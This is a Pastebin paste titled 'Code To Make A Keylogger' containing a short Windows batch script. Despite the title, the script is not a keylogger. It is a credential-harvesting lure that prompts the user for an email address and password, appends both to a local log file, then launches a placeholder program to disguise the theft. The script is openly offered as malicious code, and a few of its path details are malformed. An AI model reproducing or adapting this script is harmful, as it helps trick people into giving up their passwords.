Advertisement
Guest User

Code To Make A Keylogger

a guest
Dec 17th, 2017
7,409
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. @echo off
  2. color 0d
  3. cls
  4. echo Please Enter Your Email Address And Password
  5. echo.
  6. echo.
  7. cd "C:Logs"
  8. set /p user=Username:
  9. set /p pass=Password:
  10. echo Username="%user%" Password="%pass%" >> Logs.
  11. start >>Program Here<<
  12. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement